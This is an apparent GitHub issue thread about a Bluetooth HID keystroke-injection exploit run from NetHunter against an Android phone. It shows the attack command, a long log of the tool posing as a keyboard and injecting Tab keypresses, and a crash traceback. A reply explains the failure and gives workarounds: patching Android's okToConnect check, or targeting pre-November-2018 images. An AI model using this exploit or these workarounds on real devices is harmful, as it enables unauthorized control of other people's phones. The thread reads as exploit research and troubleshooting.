I run on both android unpatched phones using nethunter
Opened this issue · 2 comments
It keep navigating between icons but not open browser or inject code and turn back with error
└─# ./keystroke-injection-android-linux.py -i hci0 -t 64:D0:D6:4E:44:85
[2024-02-27 16:40:26.283] executing 'sudo service bluetooth restart'
[2024-02-27 16:40:27.994] configuring Bluetooth adapter
[2024-02-27 16:40:28.008] calling RegisterProfile
[2024-02-27 16:40:28.017] running dbus loop
[2024-02-27 16:40:28.126] executing 'sudo hciconfig hci0 name Hi, My Name is Keyboard'
[2024-02-27 16:40:28.184] executing 'hciconfig hci0 name'
[2024-02-27 16:40:28.194] executing 'sudo hciconfig hci0 class 0x002540'
[2024-02-27 16:40:28.236] executing 'hciconfig hci0 class'
[2024-02-27 16:40:28.242] executing 'hcitool name 64:D0:D6:4E:44:85'
[2024-02-27 16:40:28.855] connecting to SDP
[2024-02-27 16:40:28.856] connecting to 64:D0:D6:4E:44:85 on port 1
[2024-02-27 16:40:30.386] SUCCESS! connected on port 1
[2024-02-27 16:40:30.387] executing 'sudo btmgmt --index hci0 io-cap 1'
[2024-02-27 16:40:30.446] executing 'sudo btmgmt --index hci0 ssp 1'
[2024-02-27 16:40:30.485] connected to SDP (L2CAP 1) on target
[2024-02-27 16:40:30.504] 'NoInputNoOutput' pairing-agent is running
[2024-02-27 16:40:30.742] connecting to 64:D0:D6:4E:44:85 on port 19
[2024-02-27 16:40:32.125] SUCCESS! connected on port 19
[2024-02-27 16:40:32.126] connecting to 64:D0:D6:4E:44:85 on port 17
[2024-02-27 16:40:32.150] SUCCESS! connected on port 17
[2024-02-27 16:40:32.151] connecting to HID Interrupt
[2024-02-27 16:40:32.152] connecting to 64:D0:D6:4E:44:85 on port 19
[2024-02-27 16:40:32.177] SUCCESS! connected on port 19
[2024-02-27 16:40:32.177] connected to HID Interrupt (L2CAP 19) on target
[2024-02-27 16:40:32.178] connected to HID Control (L2CAP 17) on target
[2024-02-27 16:40:32.329] [RX-17] 9000
[2024-02-27 16:40:32.330] [TX-17] 00
[2024-02-27 16:40:32.354] [RX-17] 15
[2024-02-27 16:40:32.430] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.431] injecting Tab keypresses for 10 seconds
[2024-02-27 16:40:32.432] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.437] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.492] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.498] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.861] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.866] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.922] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.927] [TX-19] a101000000000000000000
[2024-02-27 16:40:32.982] [TX-19] a10100002b000000000000
[2024-02-27 16:40:32.987] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.042] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.048] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.103] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.109] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.165] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.170] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.226] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.231] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.287] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.292] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.348] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.353] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.409] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.414] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.469] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.474] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.530] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.536] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.592] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.597] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.653] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.658] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.713] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.719] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.775] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.780] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.836] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.841] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.897] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.903] [TX-19] a101000000000000000000
[2024-02-27 16:40:33.960] [TX-19] a10100002b000000000000
[2024-02-27 16:40:33.965] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.020] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.025] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.081] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.086] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.141] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.146] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.202] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.207] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.263] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.268] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.324] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.330] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.386] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.392] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.447] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.455] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.510] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.516] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.572] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.577] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.633] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.638] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.694] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.699] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.755] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.760] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.816] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.822] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.878] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.883] [TX-19] a101000000000000000000
[2024-02-27 16:40:34.939] [TX-19] a10100002b000000000000
[2024-02-27 16:40:34.945] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.001] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.006] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.062] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.067] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.123] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.128] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.184] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.190] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.246] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.251] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.306] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.312] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.368] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.373] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.429] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.434] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.490] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.495] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.551] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.556] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.612] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.617] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.673] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.678] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.734] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.740] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.795] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.801] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.857] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.862] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.920] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.925] [TX-19] a101000000000000000000
[2024-02-27 16:40:35.981] [TX-19] a10100002b000000000000
[2024-02-27 16:40:35.987] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.042] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.048] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.103] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.109] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.166] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.171] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.226] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.232] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.288] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.293] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.349] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.354] [TX-19] a101000000000000000000
[2024-02-27 16:40:36.409] [TX-19] a10100002b000000000000
[2024-02-27 16:40:36.416] [TX-19] a101000000000000000000
Exception in thread Thread-1 (loop):
Traceback (most recent call last):
File "", line 3, in recv
_bluetooth.error: (104, 'Connection reset by peer')
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/usr/lib/python3.11/threading.py", line 1045, in _bootstrap_inner
self.run()
File "/usr/lib/python3.11/threading.py", line 982, in run
self._target(*self._args, **self._kwargs)
File "/hi_my_name_is_keyboard/injector/client.py", line 135, in loop
raw = self.c1.recv()
^^^^^^^^^^^^^^
File "/hi_my_name_is_keyboard/injector/client.py", line 55, in recv
raise ex
File "/hi_my_name_is_keyboard/injector/client.py", line 48, in recv
raw = self.sock.recv(64)
^^^^^^^^^^^^^^^^^^
File "", line 5, in recv
bluetooth.btcommon.BluetoothError: [Errno 104] Connection reset by peer
Traceback (most recent call last):
File "", line 3, in send
_bluetooth.error: (104, 'Connection reset by peer')
First it didn't work then ask me to install dbus module I installed then run it and that's the outcome and when I'm back to nethunter Bluetooth arsenal it shows me interface down .. any one successfuly run it on nethunter?
After encountering the same issue on my phone and digging a bit into it, I believe I know what's going on. It's an accidental "protection" added to Android around 2018. Basically, the higher layers in the BT stack signal the BT firmware to close the connection because it's in an unexpected state (that's the 104, 'connection reset by peer' error you're seeing).
The specific issue comes from Android's HID Host Service detecting it got a connection that's not fully paired (connection is not yet in BONDED state) which makes it invalid. The HID Host Service signals that it shouldn't connect with the device. You can find the "offending" function, okToConnect, at src/com/android/bluetooth/hid/HidHostService.java in the Bluetooth app pacakge of the AOSP sources.
My quick workaround to move forward with my research was to change that function to return true regardless of the bonding state, but a more "real world" solution would be to run the exploit against an Android image released prior to November 2018. I don't know BT well enough to know if you can make an unauthenticated connected reach bonded state. I doubt it's possible since the whole vulnerability in the CVE revolves around the legacy mode that allows unbonded connections.